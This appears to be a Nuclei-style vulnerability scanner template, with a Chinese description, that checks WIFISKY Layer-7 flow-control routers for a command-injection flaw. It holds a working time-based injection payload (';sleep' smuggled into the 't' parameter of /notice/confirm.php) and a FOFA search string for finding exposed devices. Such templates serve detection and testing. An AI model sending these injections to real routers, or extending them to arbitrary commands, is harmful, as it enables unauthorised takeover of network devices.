http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          GET /notice/confirm.php?t=;sleep%204 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
        - |
          GET /notice/confirm.php?t=;sleep%208 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
id: WIFISKY-7-router-RCE
info:
    author: Superhero
    description: |-
        fofa: app="WIFISKY-7层流控路由器"
        WIFISKY-7层流控路由器 接口存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。
    name: WIFISKY-7层流控路由器 命令执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/UkS08Oqpj_vvLwb1a3Phiw
    severity: high
    tags:
        - WIFISKY-7层流控路由器
